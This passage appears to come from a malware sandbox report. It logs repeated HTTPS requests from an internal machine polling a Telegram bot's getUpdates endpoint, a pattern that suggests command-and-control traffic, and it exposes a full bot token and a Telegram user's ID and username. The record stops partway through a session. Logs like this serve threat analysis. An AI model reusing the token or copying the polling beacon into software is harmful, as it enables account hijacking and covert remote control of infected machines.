2024-06-05 01:57:25 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:25 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:25 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49797	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:26 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:26 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:27 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49798	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:27 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:27 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:27 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49799	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:28 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:29 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:29 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49800	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:29 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:30 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:30 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49801	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:30 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:31 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:31 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49802	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:31 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:32 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:32 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:32 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49803	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:33 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:33 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:33 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:33 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49804	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:34 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:34 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:34 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49805	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:35 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:35 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:35 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49806	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:36 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:36 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:36 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49807	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:37 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:37 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:37 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49808	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:38 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:38 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-06-05 01:57:38 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49809	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-06-05 01:57:39 UTC	112	OUT	GET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1 Host: api.telegram.org
2024-06-05 01:57:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 05 Jun 2024 01:57:39 GMT Content-Type: application/json Content-Length: 362 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
